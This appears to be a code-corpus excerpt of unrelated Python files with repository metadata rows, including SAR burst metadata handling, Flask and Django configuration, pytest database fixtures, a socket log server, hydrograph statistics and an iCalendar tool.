burst.range_window_type, burst.range_window_coefficient,
cfg.groups, geogrid, nodata_val, ipf_ver, isce3_ver)
@classmethod
def from_file(cls, file_path: str, fmt: str):
'''Create GeoBurstMetadata class from json file
Parameter:
---------
file_path: str
File containing geocoded burst metadata
'''
if fmt == 'yaml':
yaml = YAML(typ='safe')
load = yaml.load
elif fmt == 'json':
load = json.load
else:
raise ValueError(f'{fmt} unsupported. Only "json" or "yaml" supported')
with open(file_path, 'r') as fid:
meta_dict = load(fid)
datetime_fmt = "%Y-%m-%d %H:%M:%S.%f"
sensing_start = datetime.strptime(meta_dict['sensing_start'],
datetime_fmt)
sensing_stop = datetime.strptime(meta_dict['sensing_stop'],
datetime_fmt)
azimuth_fm_rate = _poly1d_from_dict(meta_dict['azimuth_fm_rate'])
dopp_poly1d = _poly1d_from_dict(meta_dict['doppler'])
orbit = _orbit_from_dict(meta_dict['orbit'])
# init geo_runconfig
cfg = wrap_namespace(meta_dict['runconfig'])
# init geogrid
grid_dict = meta_dict['geogrid']
geogrid = GeoGridParameters(grid_dict['start_x'], grid_dict['start_y'],
grid_dict['spacing_x'],
grid_dict['spacing_y'],
grid_dict['length'], grid_dict['width'],
grid_dict['epsg'])
# get boundary from geocoded raster
product_path = cfg.product_path_group.product_path
date_str = sensing_start.strftime("%Y%m%d")
burst_id = meta_dict['burst_id']
pol = meta_dict['polarization']
output_dir = f'{product_path}/{burst_id}/{date_str}'
file_stem = f'geo_{burst_id}_{pol}'
geo_raster_path = f'{output_dir}/{file_stem}'
geo_boundary = get_boundary_polygon(geo_raster_path, np.nan)
center = geo_boundary.centroid
return cls(sensing_start, sensing_stop,
meta_dict['radar_center_frequency'],
meta_dict['wavelength'], meta_dict['azimuth_steer_rate'],
meta_dict['azimuth_time_interval'],
meta_dict['slant_range_time'], meta_dict['starting_range'],
meta_dict['range_sampling_rate'],
meta_dict['range_pixel_spacing'], azimuth_fm_rate,
dopp_poly1d, meta_dict['range_bandwidth'], pol,
meta_dict['burst_id'], meta_dict['platform_id'],
center, geo_boundary, orbit, meta_dict['orbit_direction'],
meta_dict['tiff_path'], meta_dict['i_burst'],
meta_dict['range_window_type'],
meta_dict['range_window_coefficient'], cfg, geogrid,
meta_dict['nodata'], meta_dict['input_data_ipf_version'],
meta_dict['isce3_version'])
def as_dict(self):
''' Convert self to dict for write to YAML/JSON
'''
self_as_dict = {}
for key, val in self.__dict__.items():
if key in ['border', 'center', 'sensing_start', 'sensing_stop']:
val = str(val)
elif isinstance(val, np.float64):
val = float(val)
elif key in ['azimuth_fm_rate', 'doppler']:
temp = {}
temp['order'] = val.order
temp['mean'] = val.mean
temp['std'] = val.std
temp['coeffs'] = val.coeffs
val = temp
elif key == 'orbit':
temp = {}
temp['ref_epoch'] = str(val.reference_epoch)
temp['time'] = {}
temp['time']['first'] = val.time.first
temp['time']['spacing'] = val.time.spacing
temp['time']['last'] = val.time.last
temp['time']['size'] = val.time.size
temp['position_x'] = val.position[:,0].tolist()
temp['position_y'] = val.position[:,1].tolist()
temp['position_z'] = val.position[:,2].tolist()
temp['velocity_x'] = val.velocity[:,0].tolist()
temp['velocity_y'] = val.velocity[:,1].tolist()
temp['velocity_z'] = val.velocity[:,2].tolist()
val = temp
elif key == 'runconfig':
val = unwrap_to_dict(val)
elif key == 'geogrid':
temp = {}
temp['start_x'] = val.start_x
temp['start_y'] = val.start_y
temp['spacing_x'] = val.spacing_x
temp['spacing_y'] = val.spacing_y
temp['length'] = val.length
temp['width'] = val.width
temp['epsg'] = val.epsg
val = temp
self_as_dict[key] = val
return self_as_dict
def to_file(self, dst, fmt:str):
'''Write self to file
Parameter:
---------
dst: file pointer
File object to write metadata to
fmt: ['yaml', 'json']
Format of output
'''
self_as_dict = self.as_dict()
if fmt == 'yaml':
yaml = YAML(typ='safe')
yaml.dump(self_as_dict, dst)
elif fmt == 'json':
json.dump(self_as_dict, dst, indent=4)
else:
raise ValueError(f'{fmt} unsupported. Only "json" or "yaml" supported')
| 37.930769
| 95
| 0.58548
| 8,219
| 0.833401
| 0
| 0
| 8,243
| 0.835835
| 0
| 0
| 2,373
| 0.240621
|
557c04366bccd072c61ed9301e5aeee3a5f38113
| 142
|
py
|
Python
|
app.py
|
WIZ7ZY/flask-app
|
b59b0b84543c4f0faf40c57b4753a3c324edc2d8
|
[
"MIT"
] | null | null | null |
app.py
|
WIZ7ZY/flask-app
|
b59b0b84543c4f0faf40c57b4753a3c324edc2d8
|
[
"MIT"
] | null | null | null |
app.py
|
WIZ7ZY/flask-app
|
b59b0b84543c4f0faf40c57b4753a3c324edc2d8
|
[
"MIT"
] | null | null | null |
from web import create_app
import ntplib
if __name__ == '__main__':
app = create_app(debug=False)
app.run(host='0.0.0.0', port=5000)
| 20.285714
| 38
| 0.690141
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 19
| 0.133803
|
557fbf2a8059c9beebbcd0bd1552ded759c8e7f0
| 2,227
|
py
|
Python
|
tests/test_db.py
|
andreasgrv/methinks
|
5c65fdb84e35b8082ee35963431a352e06f4af44
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_db.py
|
andreasgrv/methinks
|
5c65fdb84e35b8082ee35963431a352e06f4af44
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_db.py
|
andreasgrv/methinks
|
5c65fdb84e35b8082ee35963431a352e06f4af44
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
from methinks.db import Entry
import pytest
from server.app import create_app
from server.app import db as _db
from sqlalchemy import event
from sqlalchemy.orm import sessionmaker
@pytest.fixture(scope="session")
def app(request):
"""
Returns session-wide application.
"""
return create_app()
@pytest.fixture(scope="session")
def db(app, request):
"""
Returns session-wide initialised database.
"""
with app.app_context():
_db.drop_all()
_db.create_all()
@pytest.fixture(scope="function", autouse=True)
def session(app, db, request):
"""
Returns function-scoped session.
"""
with app.app_context():
conn = _db.engine.connect()
txn = conn.begin()
options = dict(bind=conn, binds={})
sess = _db.create_scoped_session(options=options)
# establish a SAVEPOINT just before beginning the test
# (http://docs.sqlalchemy.org/en/latest/orm/session_transaction.html#using-savepoint)
sess.begin_nested()
@event.listens_for(sess(), 'after_transaction_end')
def restart_savepoint(sess2, trans):
# Detecting whether this is indeed the nested transaction of the test
if trans.nested and not trans._parent.nested:
# The test should have normally called session.commit(),
# but to be safe we explicitly expire the session
sess2.expire_all()
sess.begin_nested()
_db.session = sess
yield sess
# Cleanup
sess.remove()
# This instruction rollsback any commit that were executed in the tests.
txn.rollback()
conn.close()
def test_insert(session):
e = Entry(text='My example', date=datetime.date.today())
session.add(e)
session.commit()
def test_delete(session):
e = Entry(text='My example', date=datetime.date.today())
session.add(e)
session.commit()
session.delete(e)
session.commit()
def test_find_by_hash(session):
e = Entry(text='My example', date=datetime.date.today())
session.add(e)
session.commit()
first = Entry.query.filter(Entry.hexid == e.hash).first()
assert first == e
| 26.831325
| 93
| 0.64661
| 0
| 0
| 1,133
| 0.508756
| 1,502
| 0.67445
| 0
| 0
| 637
| 0.286035
|
55813ead580a9fd9024544a5265e546eab6feb28
| 3,339
|
py
|
Python
|
mysite/mysite/settings.py
|
prnake/search_engine_demo
|
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
|
[
"MIT"
] | 3
|
2020-08-08T04:44:29.000Z
|
2020-09-10T07:38:11.000Z
|
mysite/mysite/settings.py
|
prnake/search_engine_demo
|
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
|
[
"MIT"
] | null | null | null |
mysite/mysite/settings.py
|
prnake/search_engine_demo
|
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
|
[
"MIT"
] | null | null | null |
import os
import environ
env = environ.Env(
# set casting, default value
DEBUG=(bool, False)
)
# reading .env file
environ.Env.read_env()
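# A minimal .env file might look like (hypothetical values):
#   DEBUG=True
#   SECRET_KEY=change-me
#   ADMIN_EMAIL=admin@example.com ops@example.com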
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# False if not in os.environ
DEBUG = env('DEBUG')
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('SECRET_KEY')
ADMIN_EMAIL = str(env('ADMIN_EMAIL')).split(' ')
ALLOWED_HOSTS = ['*']
SESSION_COOKIE_SECURE = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"search.apps.SearchConfig",
"scrapy.apps.ScrapyConfig",
'captcha',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
CSRF_COOKIE_SECURE = False
SESSION_COOKIE_SECURE = False
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
# Captcha
CAPTCHA_IMAGE_SIZE = (80, 28)
CAPTCHA_TIMEOUT = 1
| 24.91791
| 91
| 0.692123
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,133
| 0.638814
|
5581ae54a36323a4a46f3383645e34f4c26755e1
| 2,891
|
py
|
Python
|
bin/simple_log_server.py
|
kr0nt4b/ctrl_my_home
|
fd86b479d78f94aaa5d6cc92f0f49399aaef0733
|
[
"Apache-2.0"
] | null | null | null |
bin/simple_log_server.py
|
kr0nt4b/ctrl_my_home
|
fd86b479d78f94aaa5d6cc92f0f49399aaef0733
|
[
"Apache-2.0"
] | null | null | null |
bin/simple_log_server.py
|
kr0nt4b/ctrl_my_home
|
fd86b479d78f94aaa5d6cc92f0f49399aaef0733
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
"""
Simple socket server using threads
"""
import socket
import sys
from thread import *
import os
import logging
HOST = '' # Symbolic name meaning all available interfaces
PORT = 9998 # Arbitrary non-privileged port
LOG_FORMAT = '%(asctime)-15s %(message)s'
SMART_LOG = '/var/log/smart/smarthome.log'
def init_logging():
smart_log_path = os.path.dirname(SMART_LOG)
    if not os.path.exists(smart_log_path):
        os.mkdir(smart_log_path)
logging.basicConfig(filename=SMART_LOG, level=logging.DEBUG, format=LOG_FORMAT)
return logging.getLogger('log_server')
class LogServer:
def __init__(self):
self.logger = init_logging()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.logger.info('Socket created')
# Bind socket to local host and port
try:
self.sock.bind((HOST, PORT))
except socket.error as msg:
self.logger.info('Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
sys.exit()
self.logger.info('Socket bind complete')
# Start listening on socket
self.sock.listen(10)
self.logger.info('Socket now listening')
# Function for handling connections. This will be used to create threads
def client_thread(self, connection):
# Sending message to connected client
connection.send('Welcome to the logserver') # send only takes string
# infinite loop so that function do not terminate and thread do not end.
while True:
# Receiving from client
data = connection.recv(1024)
reply = 'OK\n'
if not data:
break
            tokens = data.split(' ')
            if len(tokens) > 1:
                level = tokens[1]
                if level == 'DEBUG:':
                    self.logger.debug(data)
                elif level == 'INFO:':
                    self.logger.info(data)
                elif level == 'ERROR:':
                    self.logger.error(data)
                else:
                    self.logger.info(data)
connection.sendall(reply)
# came out of loop
connection.close()
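    # Clients are expected to send space-separated lines such as
    # "sensor_ctl DEBUG: temperature read ok" (hypothetical example); the second
    # token selects the log level and unknown levels fall back to INFO.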
def start(self):
# now keep talking with the client
while True:
# wait to accept a connection - blocking call
conn, addr = self.sock.accept()
self.logger.info('Connected with ' + addr[0] + ':' + str(addr[1]))
# start new thread takes 1st argument as a function name to be run, second
# is the tuple of arguments to the function.
start_new_thread(self.client_thread, (conn,))
self.sock.close()
if __name__ == "__main__":
log_server = LogServer()
try:
log_server.start()
except KeyboardInterrupt as e:
print(e.message)
| 28.91
| 95
| 0.590107
| 2,113
| 0.730889
| 0
| 0
| 0
| 0
| 0
| 0
| 911
| 0.315116
|
5581eb881f3ca5ddfe7fd5be0a7447ea5b604281
| 1,348
|
py
|
Python
|
utils/calc_drh.py
|
leogoesger/func-flow
|
c81f73998df9b02c04c19a6beae463121d5a8898
|
[
"MIT"
] | 11
|
2018-04-14T00:34:34.000Z
|
2021-05-04T17:23:50.000Z
|
utils/calc_drh.py
|
Yesicaleon/func-flow
|
c81f73998df9b02c04c19a6beae463121d5a8898
|
[
"MIT"
] | 15
|
2019-04-02T03:35:22.000Z
|
2022-02-12T13:17:11.000Z
|
utils/calc_drh.py
|
Yesicaleon/func-flow
|
c81f73998df9b02c04c19a6beae463121d5a8898
|
[
"MIT"
] | 9
|
2018-12-01T19:46:11.000Z
|
2022-03-31T17:18:15.000Z
|
import numpy as np
from utils.helpers import *
percentiles = [10, 25, 50, 75, 90]
percentile_keys = ["ten", "twenty_five", "fifty", "seventy_five", "ninty"]
def calc_drh(flow_matrix):
"""Dimensionless Hydrograph Plotter"""
average_annual_flow = calculate_average_each_column(flow_matrix)
number_of_rows = len(flow_matrix)
number_of_columns = len(flow_matrix[0, :])
normalized_matrix = np.zeros((number_of_rows, number_of_columns))
"""Initiating the DRH object with desired keys"""
drh = {}
for index, percentile in enumerate(percentiles):
drh[percentile_keys[index]] = []
drh["min"] = []
drh["max"] = []
for row_index, _ in enumerate(flow_matrix[:, 0]):
for column_index, _ in enumerate(flow_matrix[row_index, :]):
normalized_matrix[row_index, column_index] = flow_matrix[row_index,
column_index]/average_annual_flow[column_index]
for index, percentile in enumerate(percentiles):
drh[percentile_keys[index]].append(round(np.nanpercentile(
normalized_matrix[row_index, :], percentile), 2))
drh["min"].append(round(np.nanmin(normalized_matrix[row_index, :]), 2))
drh["max"].append(round(np.nanmax(normalized_matrix[row_index, :]), 2))
return drh
| 39.647059
| 116
| 0.647626
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 153
| 0.113501
|
55837f3526a4635ce717d7aeac4df126359ab0fc
| 78
|
py
|
Python
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/nn.py
|
SauravMaheshkar/cookiecutter-kaggle-cv-starter
|
fb7b8b84daa039034d53398f64e5adfaeead6445
|
[
"MIT"
] | null | null | null |
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/nn.py
|
SauravMaheshkar/cookiecutter-kaggle-cv-starter
|
fb7b8b84daa039034d53398f64e5adfaeead6445
|
[
"MIT"
] | null | null | null |
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/nn.py
|
SauravMaheshkar/cookiecutter-kaggle-cv-starter
|
fb7b8b84daa039034d53398f64e5adfaeead6445
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
__all__ = ["Model"]
class Model(nn.Module):
pass
| 9.75
| 23
| 0.653846
| 32
| 0.410256
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.089744
|
5583a4b67ff425c68e23ee2615524b5aa7a257d1
| 591
|
py
|
Python
|
meiduo1/apps/meiduo_admin/views/user_group.py
|
woobrain/nginx-uwsgi-web
|
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
|
[
"MIT"
] | null | null | null |
meiduo1/apps/meiduo_admin/views/user_group.py
|
woobrain/nginx-uwsgi-web
|
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
|
[
"MIT"
] | 2
|
2021-05-28T19:45:17.000Z
|
2021-11-02T15:49:34.000Z
|
meiduo1/apps/meiduo_admin/views/user_group.py
|
woobrain/nginx-uwsgi-web
|
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.models import Group, Permission
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from .statistical import UserPagination
from apps.meiduo_admin.serializer.user_group import UserGroupSerializer, GroupPerSerializer
class UserGroupView(ModelViewSet):
serializer_class = UserGroupSerializer
queryset = Group.objects.all()
pagination_class = UserPagination
def simple(self,request):
data = Permission.objects.all()
ser = GroupPerSerializer(data,many=True)
return Response(ser.data)
| 32.833333
| 91
| 0.788494
| 306
| 0.517766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
558514d3c5a79e30120fc03aa990f786ff898ee6
| 355
|
py
|
Python
|
server/soman/announcements/urls.py
|
bilgorajskim/soman
|
0d65d632c39a72f51b43fae71f4b00efc7b286c1
|
[
"MIT"
] | null | null | null |
server/soman/announcements/urls.py
|
bilgorajskim/soman
|
0d65d632c39a72f51b43fae71f4b00efc7b286c1
|
[
"MIT"
] | null | null | null |
server/soman/announcements/urls.py
|
bilgorajskim/soman
|
0d65d632c39a72f51b43fae71f4b00efc7b286c1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets
from . import views
router = routers.DefaultRouter()
router.register(r'announcements', views.AnnouncementViewSet)
urlpatterns = [
url(r'^api/', include(router.urls))
]
| 27.307692
| 60
| 0.769014
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 47
| 0.132394
|
55860760bf8930847b1a7c03d8b03442f460fce6
| 414
|
py
|
Python
|
backend/app/db/__init__.py
|
MaxKochanov/stock-news
|
42776196604e91cd673c94c9f7dea71343791bd1
|
[
"MIT"
] | null | null | null |
backend/app/db/__init__.py
|
MaxKochanov/stock-news
|
42776196604e91cd673c94c9f7dea71343791bd1
|
[
"MIT"
] | null | null | null |
backend/app/db/__init__.py
|
MaxKochanov/stock-news
|
42776196604e91cd673c94c9f7dea71343791bd1
|
[
"MIT"
] | null | null | null |
from app.db.wrappers import ClickHouse
DBS = {}
async def init_databases(config):
"""
Usage example
DBS["clickhouse"] = await ClickHouse.init_async(config["clickhouse"])
DBS["mysql"] = await MySQL.init_async(config["mysql"])
"""
pass
async def shutdown_databases():
"""
await ClickHouse.close_async(DBS["clickhouse"])
await MySQL.close_async(DBS["mysql"])
"""
pass
| 19.714286
| 73
| 0.654589
| 0
| 0
| 0
| 0
| 0
| 0
| 359
| 0.86715
| 267
| 0.644928
|
5588a3d3733f037d283e357aa48613bd11e602e8
| 1,108
|
py
|
Python
|
ravendb/tests/jvm_migrated_tests/client/executor/test_request_executor.py
|
ravendb/RavenDB-Python-Client
|
6286b459b501e755fe8e8591a48acf8616605ccd
|
[
"MIT"
] | 8
|
2016-10-08T17:45:44.000Z
|
2018-05-29T12:16:43.000Z
|
ravendb/tests/jvm_migrated_tests/client/executor/test_request_executor.py
|
ravendb/RavenDB-Python-Client
|
6286b459b501e755fe8e8591a48acf8616605ccd
|
[
"MIT"
] | 5
|
2017-02-12T15:50:53.000Z
|
2017-09-18T12:25:01.000Z
|
ravendb/tests/jvm_migrated_tests/client/executor/test_request_executor.py
|
ravendb/RavenDB-Python-Client
|
6286b459b501e755fe8e8591a48acf8616605ccd
|
[
"MIT"
] | 8
|
2016-07-03T07:59:12.000Z
|
2017-09-18T11:22:23.000Z
|
from ravendb.documents.conventions.document_conventions import DocumentConventions
from ravendb.exceptions.exceptions import DatabaseDoesNotExistException
from ravendb.http.request_executor import RequestExecutor
from ravendb.http.server_node import ServerNode
from ravendb.http.topology import UpdateTopologyParameters
from ravendb.tests.test_base import TestBase
class TestRequestExecutor(TestBase):
def setUp(self):
super(TestRequestExecutor, self).setUp()
def test_throws_when_updating_topology_of_not_existing_db(self):
conventions = DocumentConventions()
with RequestExecutor.create(
self.store.urls, "no_such_db", conventions, None, None, self.store.thread_pool_executor
) as executor:
server_node = ServerNode(self.store.urls[0], "no_such")
update_topology_parameters = UpdateTopologyParameters(server_node)
update_topology_parameters.timeout_in_ms = 5000
with self.assertRaises(DatabaseDoesNotExistException):
executor.update_topology_async(update_topology_parameters).result()
| 44.32
| 99
| 0.773466
| 740
| 0.66787
| 0
| 0
| 0
| 0
| 0
| 0
| 21
| 0.018953
|
558930319f7b3b786028343bb2be22080c9650c4
| 14,091
|
py
|
Python
|
src/icaltool/icaltool.py
|
randomchars42/icaltool
|
acf482f08bb4eb7bc000c0b2591c6d76ec8fcaac
|
[
"Unlicense"
] | null | null | null |
src/icaltool/icaltool.py
|
randomchars42/icaltool
|
acf482f08bb4eb7bc000c0b2591c6d76ec8fcaac
|
[
"Unlicense"
] | null | null | null |
src/icaltool/icaltool.py
|
randomchars42/icaltool
|
acf482f08bb4eb7bc000c0b2591c6d76ec8fcaac
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python3
import csv
import logging
import logging.config
import re
import argparse
import json
import sys
from .log import log
from . import datatypes
logger = logging.getLogger(__name__)
default_column_mapping = {
'DTSTART': 0,
'DTEND': 1,
'DTSTAMP': 2,
'UID': 3,
'CREATED': 4,
'DESCRIPTION': 5,
'LAST-MODIFIED': 6,
'LOCATION': 7,
'SEQUENCE': 8,
'SUMMARY': 9,
'CATEGORIES': 10,
'CLASS': 11,
'ATTACH': 12,
'TRANSP': 13,
'RRULE': 14,
'EXDATE': 15,
'STATUS': 16
}
custom_column_names = {
'DTSTART': 'DTSTART',
'DTEND': 'DTEND',
'DTSTAMP': 'DTSTAMP',
'UID': 'UID',
'CREATED': 'CREATED',
'DESCRIPTION': 'DESCRIPTION',
'LAST-MODIFIED': 'LAST-MODIFIED',
'LOCATION': 'LOCATION',
'SEQUENCE': 'SEQUENCE',
'SUMMARY': 'SUMMARY',
'CATEGORIES': 'CATEGORIES',
'CLASS': 'CLASS',
'ATTACH': 'ATTACH',
'TRANSP': 'TRANSP',
'RRULE': 'RRULE',
'EXDATE': 'EXDATE',
'STATUS': 'STATUS'
}
standard_components = [
'VCALENDAR',
'STANDARD',
'DAYLIGHT',
'VEVENT',
'VTODO',
'VJOURNAL',
'VALARM',
'VFREEBUSY'
]
class ICalTool:
"""
Tool for handling calendar data (ical) as defined in:
RFC 2445 (https://datatracker.ietf.org/doc/html/rfc2445)
"""
def __init__(self):
self._reset()
def _reset(self):
self.vcalendar = None
def setup(self, options):
# currently only understands
# {
# "COMPONENTNAME": {
# "defined_properties": {
# "PROPERTY": [(-1|0|1), "NAMEOFCLASS"],
# }
# },
# ...
# }
for key, value in options.items():
if key in standard_components:
class_object = getattr(datatypes, key)
try:
for prop, values in value['defined_properties'].items():
if not len(values) == 2:
                            logger.warning(('illegal value for property {} in ' +
                                'defined_properties').format(prop))
continue
#setattr(class_object.defined_properties, prop, values)
class_object.defined_properties[prop] = values
except KeyError:
                    logger.warning('did not understand option "{}"'.format(
key))
def load(self, file_name, component='VEVENT',
has_header=True, custom_column_names=custom_column_names,
column_mapping=default_column_mapping,
delimiter=',', quotechar='"'):
if file_name[-3:] == 'csv':
self.csv_load(file_name, component, has_header, custom_column_names,
column_mapping, delimiter, quotechar)
elif file_name[-3:] == 'ics':
self.ical_load(file_name)
else:
logger.error('invalid file given ("{}")'.format(file_name))
sys.exit()
def csv_load(self, file_name, component='VEVENT',
has_header=True, custom_column_names=custom_column_names,
column_mapping=default_column_mapping,
delimiter=',', quotechar='"'):
with open(file_name, 'r', newline='', encoding='utf-8-sig') as \
file_handle:
logger.info('opening {}'.format(file_name))
data = csv.reader(
file_handle, delimiter=delimiter, quotechar=quotechar)
if has_header:
header = next(data)
column_mapping = self._csv_get_column_mapping(
default_column_mapping, has_header, header, custom_column_names)
self.vcalendar = datatypes.VCALENDAR()
self.vcalendar.csv_parse(component, data, column_mapping)
logger.info('loaded {}'.format(file_name))
def _csv_get_column_mapping(self, default_column_mapping, has_header,
header, custom_column_names):
if not has_header:
# no headers to parse
# so use default column mapping
return default_column_mapping
# get headers from file
column_mapping = {}
i = 0
for column in header:
column_mapping[column] = i
i = i + 1
if len(custom_column_names) == 0:
            return column_mapping
# the user provided costum columns names in a dictionary
new_mapping = {}
for column_name in column_mapping.keys():
# so go through every available column
try:
# 1. the parsed column name exists in the user
# provided dictionary
new_mapping[custom_column_names[column_name]] = \
column_mapping[column_name]
except KeyError:
# 2. the name cannot be translated so copy it
new_mapping[column_name] = \
column_mapping[column_name]
return new_mapping
def ical_load(self, file_name):
with open(file_name, 'r', newline='', encoding='utf-8-sig') as \
file_handle:
logger.info('opening {}'.format(file_name))
raw = file_handle.readlines()
lines = []
vcalendar = False
# clean up
for line in raw:
# remove the trailing "\n"
line = line.rstrip("\r\n")
# do not use empty lines
if not line == '':
if not vcalendar and line == 'BEGIN:VCALENDAR':
vcalendar = True
logger.debug('recording new VCALENDAR')
elif vcalendar:
if line == 'END:VCALENDAR':
vcalendar = False
logger.debug('finished recording VCALENDAR')
# unfold lines (folded lines begin with a single whitespace
# or tab)
elif line[0] == ' ' or line[0] == "\t":
# append to previous line
lines[len(lines) - 1] += line[1:]
else:
lines.append(line)
self.vcalendar = datatypes.VCALENDAR()
self.vcalendar.ical_parse(lines)
logger.info('loaded {}'.format(file_name))
def write(self, file_name, component):
if file_name[-3:] == 'csv':
self.csv_write(file_name, component)
elif file_name[-3:] == 'ics':
self.ical_write(file_name)
else:
logger.error('invalid file given ("{}")'.format(file_name))
sys.exit()
def csv_write(self, file_name, component='VEVENT'):
lines = []
# can only write components of one type
with open(file_name, 'w') as file_handle:
logger.info('writing to {}'.format(file_name))
# get a list of known properties to use as column names
class_object = getattr(datatypes, component)
properties = []
for prop, attributes in class_object.defined_properties.items():
if attributes[0] == 2:
continue
else:
properties.append(prop)
# build header
lines.append('"' + '","'.join(properties) + '"')
# fill with data
lines.extend(self.vcalendar.csv_write(component))
file_handle.write("\r\n".join(lines))
logger.info('finished writing to {}'.format(file_name))
def ical_write(self, file_name):
with open(file_name, 'w') as file_handle:
logger.info('writing to {}'.format(file_name))
lines = self.vcalendar.ical_write()
for line in lines:
text = ''
while True:
text += line[:74] + "\r\n"
line = ' ' + line[74:]
if line == ' ':
break
file_handle.write(text)
logger.info('finished writing to {}'.format(file_name))
def filter(self, rules):
if self.vcalendar is None:
logger.warning('cannot apply rules before calendar data has been '+
'loaded')
return
# example component rule:
# - keep only events:
# COMPONENT:+VEVENT
# - filter out all events:
# COMPONENT:-VEVENT
# - filter out all events and alarms
# COMPONENT:-VEVENT,VALARM
# example property rules:
# - filter out all components with a start date between 2015 and 2017:
# DTSTART:-2015to2017
# - keep only components with a start date between 2015-10 and 2017-11:
# DTSTART:+2015-10to2017-11
# - ... attended by john.doe@mail.domain:
# DTSTART:+2015-10to2017-11;ATTENDEE:+john.doe@mail.domain
# - ... but not by jane.doe@mail.domain:
# ...;ATTENDEE:+john.doe@mail.domain|-jane.doe@mail.domain
raw_rules = rules.split(';')
parsed_rules = {}
for raw_rule in raw_rules:
try:
name, rule = raw_rule.split(':')
except ValueError:
# no ':'
logger.warning('malformed rule {}'.format(raw_rule))
continue
logger.info('found rule for {}: "{}"'.format(name, rule))
parsed_rules[name] = rule.split('|')
try:
component_rule = parsed_rules['COMPONENT'][0]
logger.debug('found component rule: "{}"'.format(component_rule))
# sanity check
if not re.match('[+-]{1}[A-Z,]+', component_rule):
logger.error('component filter cannot have inclusion and ' +
'exclusion criteria, "{}" given'.format(component_rule))
return
components_keep = component_rule[0] == '+'
components = component_rule[1:].split(',')
del parsed_rules['COMPONENT']
except KeyError:
# no component rule
# create an empty list of components to remove
components = []
components_keep = False
self.vcalendar.filter(components, components_keep,
parsed_rules)
# taken from :
# https://stackoverflow.com/questions/9027028/argparse-argument-order
class CustomAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if not 'ordered_args' in namespace:
setattr(namespace, 'ordered_args', [])
previous = namespace.ordered_args
previous.append((self.dest, values))
setattr(namespace, 'ordered_args', previous)
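# With this action a call such as `icaltool calendar.ics -f 'COMPONENT:+VEVENT'
# -o out.ics` (hypothetical invocation) yields
# args.ordered_args == [('filter', ...), ('output', ...)], so filters and
# outputs are applied in the order they were given on the command line.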
def main():
# parse arguments
parser = argparse.ArgumentParser(
description='Tool to work with calendar data. It can read .ics ' +
'(preferred) and .csv files. You can filter the compontents ' +
'(events, todos, alarms, journals, freebusy-indicators) by their ' +
'type or the value of their properties, e.g. start date ' +
'(DTSTART) or organiser (ORGANIZER). The result can be written ' +
